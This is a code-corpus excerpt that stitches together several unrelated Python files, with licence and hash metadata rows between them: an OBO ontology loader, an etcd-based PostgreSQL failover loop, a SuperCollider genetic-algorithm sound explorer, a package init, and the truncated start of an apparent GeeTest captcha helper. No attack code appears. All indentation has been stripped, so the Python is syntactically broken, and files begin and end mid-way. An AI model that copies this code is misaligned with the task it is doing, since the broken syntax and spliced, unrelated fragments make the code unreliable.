self.header_tags = []
self.id2term = {}
self.alt2id = {}
self._resolved_imports = []
self._invalid_cache_flag = False
self._related_to = {}
# First load the built in OBO objects
builtins = StringIO("\n" + "\n\n".join(self.BUILTINS) + "\n")
self.load(builtins)
if file:
self.load(file)
def add_object(self, obj):
"""
Add an :class:`OBOObject` instance to this ontology.
"""
if obj.id in self.id2term:
raise ValueError("OBOObject with id: %s already in "
"the ontology" % obj.id)
self.objects.append(obj)
self.id2term[obj.id] = obj
self._invalid_cache_flag = True
def add_header_tag(self, tag, value):
"""
Add header tag, value pair to this ontology.
"""
self.header_tags.append((tag, value))
def load(self, file, progress_callback=None):
"""
Load terms from a file.
:param file-like file:
A file-like like object describing the ontology in obo format.
:param function progress_callback:
An optional function callback to report on the progress.
"""
if isinstance(file, six.string_types):
if six.PY3:
file = open(file, "r", encoding="utf-8")
else:
file = open(file, "rb")
parser = OBOParser(file)
current = None
tag_values = []
for event, value in parser.parse(progress_callback=progress_callback):
if event == "TAG_VALUE":
tag_values.append(value)
elif event == "START_STANZA":
current = OBOObject.Dispatch[value]()
elif event == "CLOSE_STANZA":
current.add_tags(tag_values)
self.add_object(current)
current = None
tag_values = []
elif event == "HEADER_TAG":
self.add_header_tag(*value)
elif event != "COMMENT":
raise Exception("Parse Error! Unknown parse "
"event {0}".format(event))
imports = [value for tag, value in self.header_tags
if tag == "import"]
if imports:
warnings.warn("Import header tags are not supported")
# while imports:
# url = imports.pop(0)
# if uri not in self._resolved_imports:
# imported = self.parse_file(open(url, "rb"))
# ontology.update(imported)
# self._resolved_imports.append(uri)
def dump(self, file):
# deprecated use write
self.write(file)
def write(self, stream):
"""
Write the contents of the ontology to a `file` in .obo format.
:param file-like file:
A file like object.
"""
if isinstance(stream, six.string_types):
if six.PY3:
stream = open(stream, "w", encoding="utf-8")
else:
stream = open(stream, "wb")
for key, value in self.header_tags:
stream.write(key + ": " + value + "\n")
# Skip the builtins
for obj in self.objects[len(self.BUILTINS):]:
stream.write("\n")
stream.write(obj.format_stanza())
stream.write("\n")
def update(self, other):
"""
Update this ontology with the terms from `other`.
"""
for term in other:
if term.id in self:
if not term.is_annonymous:
self.term(term.id).update(term)
else: # Do nothing
pass
else:
self.add_object(term)
self._invalid_cache_flag = True
def _cache_validate(self, force=False):
"""
Update the relations cache if `self._invalid_cache` flag is set.
"""
if self._invalid_cache_flag or force:
self._cache_relations()
def _cache_relations(self):
"""
Collect all relations from parent to a child and store it in
``self._related_to`` member.
"""
related_to = defaultdict(list)
for obj in self.objects:
for rel_type, id in self.related_terms(obj):
term = self.term(id)
related_to[term].append((rel_type, obj))
self._related_to = related_to
self._invalid_cache_flag = False
def term(self, id):
"""
Return the :class:`OBOObject` associated with this id.
:param str id:
Term id string.
"""
if isinstance(id, six.string_types):
if id in self.id2term:
return self.id2term[id]
elif id in self.alt2id:
return self.id2term[self.alt2id[id]]
else:
raise ValueError("Unknown term id: %r" % id)
elif isinstance(id, OBOObject):
return id
def terms(self):
"""
Return all :class:`Term` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Term"]
def term_by_name(self, name):
"""
Return the term with name `name`.
"""
terms = [t for t in self.terms() if t.name == name]
if len(terms) != 1:
raise ValueError("Unknown term name: %r" % name)
return terms[0]
def typedefs(self):
"""
Return all :class:`Typedef` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Typedef"]
def instances(self):
"""
Return all :class:`Instance` instances in the ontology.
"""
return [obj for obj in self.objects if obj.stanza_type == "Instance"]
def root_terms(self):
"""
Return all root terms (terms without any parents).
"""
return [term for term in self.terms() if not self.parent_terms(term)]
def related_terms(self, term):
"""
Return a list of (`rel_type`, `term_id`) tuples where `rel_type` is
relationship type (e.g. 'is_a', 'has_part', ...) and `term_id` is
the id of the term in the relationship.
"""
term = self.term(term) if not isinstance(term, OBOObject) else term
related = [(tag, value)
for tag in ["is_a"] # TODO: add other typedef ids
for value in term.values.get(tag, [])]
relationships = term.values.get("relationship", [])
for rel in relationships:
related.append(tuple(rel.split(None, 1)))
return related
def edge_types(self):
"""
Return a list of all edge types in the ontology.
"""
return [obj.id for obj in self.objects if obj.stanza_type == "Typedef"]
def parent_edges(self, term):
"""
Return a list of (rel_type, parent_term) tuples.
"""
term = self.term(term)
parents = []
for rel_type, parent in self.related_terms(term):
parents.append((rel_type, self.term(parent)))
return parents
def child_edges(self, term):
"""
Return a list of (rel_type, source_term) tuples.
"""
self._cache_validate()
term = self.term(term)
return self._related_to.get(term, [])
def super_terms(self, term):
"""
Return a set of all super terms of `term` up to the most general one.
"""
terms = self.parent_terms(term)
visited = set()
queue = set(terms)
while queue:
term = queue.pop()
visited.add(term)
queue.update(self.parent_terms(term) - visited)
return visited
def sub_terms(self, term):
"""
Return a set of all sub terms for `term`.
"""
terms = self.child_terms(term)
visited = set()
queue = set(terms)
while queue:
term = queue.pop()
visited.add(term)
queue.update(self.child_terms(term) - visited)
return visited
def child_terms(self, term):
"""
Return a set of all child terms for this `term`.
"""
self._cache_validate()
term = self.term(term)
children = []
for rel_type, term in self.child_edges(term):
children.append(term)
return set(children)
def parent_terms(self, term):
"""
Return a set of all parent terms for this `term`.
"""
term = self.term(term)
parents = []
for rel_type, id in self.parent_edges(term):
parents.append(self.term(id))
return set(parents)
def relations(self):
"""
Return a list of all relations in the ontology.
"""
relations = []
for obj in self.objects:
for type_id, id in obj.related:
target_term = self.term(id)
relations.append((obj, type_id, target_term))
return relations
def __len__(self):
"""
Return the number of all objects in the ontology.
"""
return len(self.objects)
def __iter__(self):
"""
Return an iterator over all objects in the ontology.
"""
return iter(self.objects)
def __contains__(self, oboid):
return oboid in self.id2term
def __getitem__(self, oboid):
"""
Get the object by it's id `oboid`
"""
return self.id2term[oboid]
def to_network(self, terms=None):
"""
Return an Orange.network.Network instance constructed from
this ontology.
"""
edge_types = self.edge_types()
terms = self.terms()
from Orange.orng import orngNetwork
import orange
network = orngNetwork.Network(len(terms), True, len(edge_types))
network.objects = dict([(term.id, i) for i, term in enumerate(terms)])
edges = defaultdict(set)
for term in self.terms():
related = self.related_terms(term)
for relType, relTerm in related:
edges[(term.id, relTerm)].add(relType)
edgeitems = edges.items()
for (src, dst), eTypes in edgeitems:
network[src, dst] = [1 if e in eTypes else 0 for e in edge_types]
domain = orange.Domain([orange.StringVariable("id"),
orange.StringVariable("name"),
orange.StringVariable("def"),
], False)
items = orange.ExampleTable(domain)
for term in terms:
ex = orange.Example(domain, [term.id, term.name, term.values.get("def", [""])[0]])
items.append(ex)
relationships = set([", ".join(sorted(eTypes)) for (_, _), eTypes in edgeitems])
domain = orange.Domain([orange.FloatVariable("u"),
orange.FloatVariable("v"),
orange.EnumVariable("relationship", values=list(edge_types))
], False)
id2index = dict([(term.id, i + 1) for i, term in enumerate(terms)])
links = orange.ExampleTable(domain)
for (src, dst), eTypes in edgeitems:
ex = orange.Example(domain, [id2index[src], id2index[dst], eTypes.pop()])
links.append(ex)
network.items = items
network.links = links
network.optimization = None
return network
def to_networkx(self, terms=None):
"""
Return a NetworkX graph of this ontology.
"""
import networkx
graph = networkx.DiGraph()
edge_types = self.edge_types()
edge_colors = {"is_a": "red"}
if terms is None:
terms = self.terms()
else:
terms = [self.term(term) for term in terms]
super_terms = [self.super_terms(term) for term in terms]
terms = reduce(operator.ior, super_terms, set(terms))
for term in terms:
graph.add_node(term.id, name=term.name)
for term in terms:
for rel_type, rel_term in self.related_terms(term):
rel_term = self.term(rel_term)
if rel_term in terms:
graph.add_edge(term.id, rel_term.id, label=rel_type,
color=edge_colors.get(rel_type, "blue"))
return graph
def to_graphviz(self, terms=None):
"""
Return an pygraphviz.AGraph representation of the ontology.
If `terms` is not `None` it must be a list of terms in the ontology.
The graph will in this case contain only the super graph of those
terms.
"""
import pygraphviz as pgv
graph = pgv.AGraph(directed=True, name="ontology")
edge_types = self.edge_types()
edge_colors = {"is_a": "red"}
if terms is None:
terms = self.terms()
else:
terms = [self.term(term) for term in terms]
super_terms = [self.super_terms(term) for term in terms]
terms = reduce(operator.ior, super_terms, set(terms))
for term in terms:
graph.add_node(term.id, label=term.name)
for root in self.root_terms():
node = graph.get_node(root.id)
node.attr["rank"] = "max"
for term in terms:
for rel_type, rel_term in self.related_terms(term):
rel_term = self.term(rel_term)
if rel_term in terms:
graph.add_edge(term.id, rel_term.id, label=rel_type,
color=edge_colors.get(rel_type, "blue"))
return graph
def name_mangle(tag):
"""
Mangle tag name if it conflicts with python keyword.
>>> name_mangle("def"), name_mangle("class")
('def_', 'class_')
"""
if keyword.iskeyword(tag):
return tag + "_"
else:
return tag
def name_demangle(tag):
"""
Reverse of `name_mangle`.
"""
if tag.endswith("_") and keyword.iskeyword(tag[:-1]):
return tag[:-1]
else:
return tag
def load(file):
"""
Load an ontology from a .obo file.
"""
return OBOOntology(file)
def foundry_ontologies():
"""
Return a list of ontologies available from the OBOFoundry `website
<http://www.obofoundry.org/>`_. The list contains a tuples of the form
`(title, url)` for instance
``('Biological process', 'http://purl.obolibrary.org/obo/go.obo')``
"""
warnings.warn(
"foundry_ontologies is deprecated and most likely returns an "
"empty list",
DeprecationWarning, stacklevel=2
)
stream = urlopen("http://www.obofoundry.org/")
encoding = stream.headers.get_charsets("utf-8")[0]
text = stream.read().decode(encoding)
pattern = r'<td class=".+?">\s*<a href=".+?">(.+?)</a>\s*</td>\s*<td class=".+?">.*?</td>\s*<td class=".+?">.*?</td>\s*?<td class=".+?">\s*<a href="(.+?obo)">.+?</a>'
return re.findall(pattern, text)
if __name__ == "__main__":
import doctest
stanza = '''[Term]
id: FOO:001
name: bar
'''
seinfeld = StringIO("""
[Typedef]
id: parent
[Typedef]
id: child
inverse_of: parent ! not actually used yet
[Term]
id: 001
name: George
[Term]
id: 002
name: Estelle
relationship: parent 001 ! George
[Term]
id: 003
name: Frank
relationship: parent 001 ! George
""") # TODO: fill the ontology with all characters
term = OBOObject.parse_stanza(stanza)
seinfeld = OBOOntology(seinfeld)
print(seinfeld.child_edges("001"))
doctest.testmod(extraglobs={"stanza": stanza, "term": term},
optionflags=doctest.ELLIPSIS)
| gpl-3.0 | 2,057,996,227,598,516,200 | 27.902527 | 170 | 0.544529 | false |
miketonks/governor | helpers/ha.py | 1 | 4532 | import sys, time, re, urllib2, json, psycopg2
import logging
from base64 import b64decode
import helpers.errors
import inspect
logger = logging.getLogger(__name__)
def lineno():
"""Returns the current line number in our program."""
return inspect.currentframe().f_back.f_lineno
class Ha:
def __init__(self, state_handler, etcd):
self.state_handler = state_handler
self.etcd = etcd
def acquire_lock(self):
return self.etcd.attempt_to_acquire_leader(self.state_handler.name)
def update_lock(self):
return self.etcd.update_leader(self.state_handler)
def update_last_leader_operation(self):
return self.etcd.update_last_leader_operation(self.state_handler.last_operation)
def is_unlocked(self):
return self.etcd.leader_unlocked()
def has_lock(self):
return self.etcd.am_i_leader(self.state_handler.name)
def fetch_current_leader(self):
return self.etcd.current_leader()
def run_cycle(self):
try:
if self.state_handler.is_healthy():
if self.is_unlocked():
logging.info("Leader is unlocked - starting election")
if self.state_handler.is_healthiest_node(self.etcd):
if self.acquire_lock():
if not self.state_handler.is_leader():
self.state_handler.promote()
return "promoted self to leader by acquiring session lock"
return "acquired session lock as a leader"
else:
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoted self due after trying and failing to obtain lock"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "following new leader after trying and failing to obtain lock"
else:
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoting self because i am not the healthiest node"
elif self.fetch_current_leader() is None:
self.state_handler.follow_no_leader()
return "waiting on leader to be elected because i am not the healthiest node"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "following a different leader because i am not the healthiest node"
else:
if self.has_lock():
self.update_lock()
if not self.state_handler.is_leader():
self.state_handler.promote()
return "promoted self to leader because i had the session lock"
else:
return "I am the leader with the lock"
else:
logger.debug("does not have lock")
if self.state_handler.is_leader():
self.state_handler.demote(self.fetch_current_leader())
return "demoting self because i do not have the lock and i was a leader"
else:
self.state_handler.follow_the_leader(self.fetch_current_leader())
return "I am a secondary and i am following a leader"
else:
if not self.state_handler.is_running():
self.state_handler.start(master=self.has_lock())
return "postgresql was stopped. starting again."
return "no action. not healthy enough to do anything."
except helpers.errors.CurrentLeaderError:
logger.error("failed to fetch current leader from etcd")
except psycopg2.OperationalError:
logger.error("Error communicating with Postgresql. Will try again.")
except helpers.errors.HealthiestMemberError:
logger.error("failed to determine healthiest member fromt etcd")
def run(self):
while True:
self.run_cycle()
time.sleep(10)
| mit | 4,333,031,349,101,279,700 | 43.871287 | 105 | 0.541483 | false |
kitefishlabs/Genomic | genomic5.py | 1 | 16909 | import sc, random, contextlib, wave, os, math
import shlex, subprocess, signal
import NRTOSCParser3
import numpy as np
import scipy.signal
# generator class for weighted random numbers
#
# Pass in one or the other:
# - weights: custom weights array
# - size: size of "standard" weights array that algo should make on its own
#
# call next to actually make the random selection
#
class RandomGenerator_8Bit(object):
def __init__(self, initval=-1):
if initval >= 0:
self.val = initval
else:
self.val = random.randint(0,128)
def next(self, scale=1.0):
self.val = random.randint(0,128)
def __call__(self): return self.next()
# helper function
def midi2hz(m): return pow(2.0, (m/12.0))
# slot assignments for sigmaSynth
ALPHA = 0
C_DELAY = 1
BETA = 2
D_MULT = 3
GAMMA = 4
MS_BINS = 5
class GenomicExplorer:
def __init__(self, anchor, sfilenames, size=20, kdepth=10): #, start_state=[1.0, 0.0, 1.0, 1.0, 1.0, 0.0]
self.anchor = anchor
self.sfpaths = [(anchor + '/snd/' + sfilename) for sfilename in sfilenames]
self.filenames = sfilenames
self.sfinfos = []
for path in self.sfpaths:
with contextlib.closing(wave.open(path,'r')) as f:
frames = f.getnframes()
rate = f.getframerate()
dur = frames/float(rate)
self.sfinfos += [{'rate':rate,'dur':dur}]
self.mutation_prob = 0.05
#self.xover_prob = 0.05
self.depth = kdepth
# 'alpha', 'c_delay', 'beta', 'd_mult', 'gamma', 'ms_bins'
self.parser = NRTOSCParser3.NRTOSCParser3(anchor=self.anchor)
self.rawtable, self.rawmaps, self.dists = dict(), dict(), dict()
print self.sfpaths
print self.sfinfos
self.init_population(size=size)
def init_population(self, size):
self.population = []
for n in range(size):
#start = [random.randrange(500, 1000)*0.001, random.randrange(0,50)*0.001, random.randrange(500, 1000)*0.001, random.randrange(100,1000)*0.01, random.randrange(500, 1000)*0.001, random.randrange(0,5000)*0.01]
self.population += [Genome()] #random seed
# self.population += [Genome(starter)]
self.population[0] = Genome(values=[0,0,0,0,0,0])
self.analyze_individual(0)
self.activate_raw_data(0)
self.compare_all_individuals(aflag=True)
def mutate_pop(self):
for indiv in range(1, len(self.population)):
if random.random() < self.mutation_prob:
print "indiv: ", indiv
self.population[ indiv ].mutate()
self.do_update_cascade(indiv)
def do_update_cascade(self, index, clearedits=False):
if clearedits is True:
self.population[ index ].edits = 0
else:
self.population[ index ].edits += 1
self.analyze_individual( index )
self.activate_raw_data( index )
self.compare_individual_chi_squared( index )
# self.compare_individual( index )
def mate(self, a, b, kill_index):
# cut = random.randint(0,5)
offspring = None
if random.random() < 0.5:
offspring = self.population[a].values[:]
else:
offspring = self.population[b].values[:]
# basic gene selection from 2 parents
for i in range(6):
if random.random() < 0.5:
offspring[i] = self.population[a].values[i]
else:
offspring[i] = self.population[b].values[i]
self.population[kill_index] = Genome(offspring)
self.do_update_cascade(kill_index, True)
def sort_by_distances(self, depth):
sorted_dists = [[k, self.dists[k], self.population[k].age, self.population[k].edits] for k in sorted(self.dists.keys())]
sorted_dists = sorted(sorted_dists[1:], key = lambda row: row[1]) # + (maxedits - row[3])))
return sorted_dists[:depth], sorted_dists[(-1*depth):]
def reproduce(self, depth=25):
kills, duplicates = self.sort_by_distances(depth)
print 'depth: ', depth
# depth # of times: choose 2 random parents to mate and overwrite replacement in unfit individual's slot
for n in range(depth):
print 'num. duplicates: ', len(duplicates)
aidx = duplicates[ random.randint(0, depth-1) ][0]
bidx = duplicates[ random.randint(0, depth-1) ][0]
kidx = kills[ random.randint(0, depth-1) ][0]
self.mate(aidx, bidx, kidx)
def age_pop(self):
for i in range(len(self.population)): self.population[i].age += 1
def iterate(self, iters=1):
sc.quit()
for iter in range(iters):
self.age_pop()
self.mutate_pop()
# self.crossover()
if (iter%20)==0:
print self.population[0].age
self.reproduce(self.depth)
def print_all_individuals(self):
print '== pop ==========================='
for g in self.population: print g
def start_sc(self):
try:
sc.start(verbose=1, spew=1, startscsynth=1)
except OSError: # in case we've already started the synth
print 'QUIT!'
sc.quit()
print 'sfpath: ', self.sfpath
for i, sfpath in enumerate(self.sfpaths):
bnum = sc.loadSnd(sfpath, wait=False)
print 'bnum: ', bnum
self.infos[i]['bnum'] = bnum
return 1
# |outbus=20, srcbufNum, start=0.0, dur=1.0, transp=1.0, c_delay=0.0, c_decay=0.0, d_mult=1.0, d_amp=0.7, ms_bins=0, alpha=1, beta=1, gamma=1|
def play_genome(self, index):
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
print '===================\n', self.infos[slot]['dur']
sc.Synth('sigmaSynth',
args=[
'srcbufNum', self.infos[slot]['bnum'],
'start', 0,
'dur', self.infos[slot]['dur']*1000,
'transp', tr,
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
def analyze_individual(self, index):
# oscpath = os.path.join(self.anchor, 'snd', 'osc', `index`, (os.path.splitext(self.filename)[0] + '_sigmaAnalyzer.osc'))
# mdpath = os.path.join(self.anchor, 'snd', 'md', `index`, self.filename)
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
oscpath, mdpath = self.parser.createNRTScore(self.sfpaths[slot],
index=index,
tratio=tr,
srate=self.sfinfos[slot]['rate'],
duration=self.sfinfos[slot]['dur'],
params=[
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
cmd = 'scsynth -N ' + oscpath + ' _ _ 44100 WAVE float32 -o 1'
# print cmd
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
# print 'PID: ', p.pid
rc = p.wait()
# print 'RC: ', rc
if rc == 1:
num_frames = int(math.ceil(self.sfinfos[slot]['dur'] / 0.04 / tr))
# print 'num frames: ', num_frames
self.rawtable[index] = (mdpath, num_frames)
# print self.rawtable
def render_individual(self, index):
vals = self.population[index].realvalues
if vals[C_DELAY] < 1.0:
cdelay = 0.0
else:
cdelay = vals[C_DELAY]
decay = 0.9
tr = self.population[index].tratio
if index == 0:
slot = 0
else:
slot = 1
oscpath, mdpath = self.parser.createNRTScore(self.sfpaths[slot],
index=index,
tratio=tr,
srate=self.sfinfos[slot]['rate'],
duration=self.sfinfos[slot]['dur'],
params=[
'c_delay', cdelay,
'c_decay', decay,
'd_mult', vals[D_MULT],
'ms_bins', vals[MS_BINS],
'alpha', vals[ALPHA],
'beta', vals[BETA],
'gamma', vals[GAMMA]])
cmd = 'scsynth -N ' + oscpath + ' _ ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff')) + ' 44100 AIFF int16 -o 1'
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
rc = p.wait()
if rc == 1:
print 'SUCCESS: ', os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff'))
rc = 0
else:
return None
cmd = 'sox -b 16 ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff')) + ' ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.wav')) # + '; rm ' + os.path.join(self.anchor, 'snd', 'out', (str(index) + '.aiff'))
print cmd
args = shlex.split(cmd)
p = subprocess.Popen(args, stdout=subprocess.PIPE, stderr=subprocess.PIPE) #, shell=True, close_fds=True)
rc = p.wait()
print rc
if rc == 1: ' DOUBLE SUCCESS!!'
def activate_raw_data(self, index):
mdpath = self.rawtable[index][0]
num_frames = self.rawtable[index][1]
self.rawmaps[index] = np.memmap(mdpath, dtype=np.float32, mode='r', offset=272, shape=(num_frames, 25))
"""
COMPARE_ALL_INDIVIDUALS:
... to individual in slot 0!
"""
def compare_all_individuals(self, aflag=False):
for i in range(1, len(self.population)):
if aflag:
self.analyze_individual(i)
self.activate_raw_data(i)
# self.compare_individual_chi_squared(i)
self.compare_individual(i)
print self.dists
return self.dists
"""
COMPARE_INDIVIDUAL:
... to individual in the slot that is stipulated by the arg zeroindex!
- by convention, we should usually put what we are comparing to in slot 0
"""
def compare_individual(self, index, zeroindex=0):
i_length = self.rawmaps[index].shape[0]
zr0_length = self.rawmaps[zeroindex].shape[0]
print i_length, ' | ', zr0_length
# i1_length = self.rawmaps[index-1].shape[0] ## <--- NEIGHBOR comparison
# print i_length, ' | ', i1_length, ' | ', zr0_length
# based on length comparison, resample the mutated individuals so that they are same length as the zeroth individual (that does not mutate)
# if indiv. is longer, resample indiv., take abs. diff., sum, div. by length
if zr0_length < i_length:
zero_dist = float(np.sum(np.abs(scipy.signal.signaltools.resample(self.rawmaps[index], zr0_length, window='hanning') - self.rawmaps[0]))) / float(zr0_length)
# print self.dists[index]
# if zeroth indiv. is longer, resample zeroth indiv., take abs. diff., sum, div. by length, then do same comparison with "neighbor"
elif i_length < zr0_length:
zero_dist = float(np.sum(np.abs(self.rawmaps[index] - scipy.signal.signaltools.resample(self.rawmaps[0], float(i_length), window='hanning')))) / float(i_length)
else:
# otherwise, take abs. diff., sum, div. by length, then do same comparison with "neighbor"
# print 'ZERO'
zero_dist = float(np.sum(np.abs(self.rawmaps[index][:,1:] - self.rawmaps[0][:,1:]))) / float(zr0_length)
### CHECK THIS DISTANCE CALCULATION!!!!!!
power_dist = float(np.sqrt(np.sum(np.abs(self.rawmaps[index][:,0] - self.rawmaps[0][:,0])))) / float(zr0_length)
print (zero_dist, (power_dist * 10.0))
zero_dist += (power_dist * 10.0)
# if i1_length < i_length:
# neighbor_dist = float(np.sum(np.abs(scipy.signal.signaltools.resample(self.rawmaps[index-1], i_length, window='hanning') - self.rawmaps[index]))) / float(i_length)
# elif i_length < i1_length:
# neighbor_dist = float(np.sum(np.abs(self.rawmaps[index-1] - scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning')))) / float(i1_length)
# else:
# print 'ZERO-NEIGHBOR'
# neighbor_dist = float(np.sum(np.abs(self.rawmaps[index-1] - scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning')))) / float(i1_length)
# self.dists[index] = zero_dist + neighbor_dist
self.dists[index] = zero_dist
def compare_individual_chi_squared(self, index):
i_length = self.rawmaps[index].shape[0]
i1_length = self.rawmaps[index-1].shape[0]
zr0_length = self.rawmaps[0].shape[0]
# print i_length, '|', zr0_length
# based on length comparison, resample the mutated individuals so that they are same length as the zeroth individual (that does not mutate)
# if indiv. is longer, resample indiv., take abs. diff., sum, div. by length
if zr0_length < i_length:
zero_dist = scipy.stats.mstats.chisquare(scipy.signal.signaltools.resample(self.rawmaps[index], zr0_length, window='hanning'), self.rawmaps[0])
# print self.dists[index]
# if zeroth indiv. is longer, resample zeroth indiv., take abs. diff., sum, div. by length, then do same comparison with "neighbor"
elif i_length < zr0_length:
zero_dist = scipy.stats.mstats.chisquare(self.rawmaps[index], scipy.signal.signaltools.resample(self.rawmaps[0], i_length, window='hanning'))
else:
# otherwise, take abs. diff., sum, div. by length, then do same comparison with "neighbor"
print 'CHI-ZERO'
zero_dist = scipy.stats.mstats.chisquare(self.rawmaps[index], self.rawmaps[0])
if i1_length < i_length:
neighbor_dist = scipy.stats.mstats.chisquare(scipy.signal.signaltools.resample(self.rawmaps[index-1], i_length, window='hanning') - self.rawmaps[index])
elif i_length < i1_length:
neighbor_dist = scipy.stats.mstats.chisquare(self.rawmaps[index-1], scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning'))
else:
print 'CHI-NEIGHBOR'
neighbor_dist = scipy.stats.mstats.chisquare(self.rawmaps[index-1], scipy.signal.signaltools.resample(self.rawmaps[index], i1_length, window='hanning'))
nsum = np.sum(np.abs(neighbor_dist[0].data[:24]))
zsum = np.sum(np.abs(zero_dist[0].data[:24]))
nasum = neighbor_dist[0].data[24]
zasum = zero_dist[0].data[24]
self.dists[index] = nsum + zsum - (24.0 * nasum) - (24.0 * zasum)
class Genome:
def __init__(self, values=None, slotranges=[[1.0,0.5],[0.0,0.05],[1.0, 0.5],[1.0,10.],[1.0,0.5],[0.0,50.]]):
# """
# 'alpha', 'c_delay', 'beta', 'd_mult', 'gamma', 'ms_bins'
# [[1.0,0.5],[0.0,0.05],[1.0,0.5],[1.0,10.],[1.0,0.5],[0.0,50.]]
# """
self.tratio = 1.0 # CHECK THIS... WHY IS IT HERE/in Hertz!!! ???
self.boundaries = slotranges
self.generators = [RandomGenerator_8Bit(-1) for n in range(6)] ### CONSTANT WARNING
#StaticGenerator_8Bit(VAL) ???
if values is None:
print 'values is None, generators are seeded randomly!'
self.values = [gen.val for gen in self.generators]
else:
self.values = values
self.bitlength = len(self.values) * 8
self.binarystring = vals_to_binarystring(self.values)
# print self.values
# print type(self.values[0])
self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
self.age = 0
self.edits = 0
def __repr__(self):
print tuple(self.values)
print ((self.age, self.edits) + tuple(self.values) + tuple(self.binarystring))
return "%9i/%9i || %.6f|%.6f|%.6f|%.6f|%.6f|%.6f" % ((self.age, self.edits) + tuple(self.realvalues)) # + tuple(self.binarystring)
def mutate(self):
pos = random.randint(0,(self.bitlength-1))
# flip bit
print 'bit flipped to: ', abs(1 - int(self.binarystring[pos],2))
self.binarystring = substitute_char_in_string(self.binarystring, pos, abs(1 - int(self.binarystring[pos],2)))
# recalc binary string
self.values = binarystring_to_vals(self.binarystring)
print "values: ", self.values
self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
# def xover_sub(self, pos, incomingSeq, headortail=0):
# if headortail == 0:
# print '<<>> ', self.binarystring
# print '<<>> ', pos
# print '<<>> ', incomingSeq
# self.binarystring = incomingSeq[:pos] + self.binarystring[pos:]
# else:
# print '<<>> ', self.binarystring
# print '<<>> ', pos
# print '<<>> ', incomingSeq
# self.binarystring = self.binarystring[:pos] + incomingSeq[:(len(self.binarystring)-pos)]
# # recalc binary string
# print '==== ', self.binarystring
# self.values = binarystring_to_vals(self.binarystring)
# print "values: ", self.values
# self.realvalues = [lininterp(val,self.boundaries[i]) for i,val in enumerate(self.values)]
def lininterp(val,bounds=[0.,1.]):
return (((val/128.0)*(bounds[1]-bounds[0]))+bounds[0])
def substitute_char_in_string(s, p, c):
l = list(s)
l[p] = str(c)
return "".join(l)
# def substitute_string_head(s, p, snew):
# s1 = snew[:]
# print '++++ ', s1
# s2 = s[p:]
# print '++++ ', s2
# return (s1 + s2)[:len(s)]
#
# def substitute_string_tail(s, p, snew):
# s1 = s[:p]
# print '==== ', s1
# print len(s)
# print p
# s2 = snew[:(len(s)-p)]
# print '==== ', s2
# return (s1 + s2)[:len(s)]
def vals_to_binarystring(vals = [0, 0, 0, 0, 0]):
return ''.join((("{0:08b}".format(val)) for val in vals))
# never a '0bXXX' string!
def binarystring_to_vals(binstring):
mystring = binstring[:]
length = len(mystring) / 8 # ignore the last digits if it doesn't chunk into 8-item substrings
res = []
# print mystring[(n*8):((n+1)*8)]
return [int(mystring[(n*8):((n+1)*8)], 2) for n in range(length)]
# if __name__=='__main__':
# genex = GenomicExplorer('/Users/kfl/dev/python/sc-0.3.1/genomic', 'test.wav')
# genex.analyze_genome(1) | gpl-3.0 | 3,330,973,013,081,838,600 | 33.161616 | 235 | 0.644923 | false |
squillero/sgx | sgx/algorithms/__init__.py | 1 | 1569 | # -*- coding: utf-8 -*-
#############################################################################
# _________ ____________ ___ #
# / _____// _____/\ \/ / ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# \_____ \/ \ ___ \ / THE E(X)TENDED (S)ELFISH (G)ENE ALGORITHM #
# / \ \_\ \/ \ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ #
# /_________/\________/___/\ \ https://github.com/squillero/sgx #
# \_/ #
# #
# A quick 'n dirty versatile population-less evolutionary optimizer loosely #
# inspired by a cool interpretation of the Darwinian theory. #
# #
#############################################################################
# Copyright 2021 Giovanni Squillero
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from .simple import *
| lgpl-3.0 | 7,524,890,428,544,134,000 | 53.103448 | 77 | 0.40854 | false |
9468305/script | geetest_offline/util.py | 1 | 3599 | #!/usr/local/bin/python3
# -*- coding: utf-8 -*-
'''
geetest常用公共方法
'''
SPLIT_ARRAY_JS = '''
function getSplitArray() {
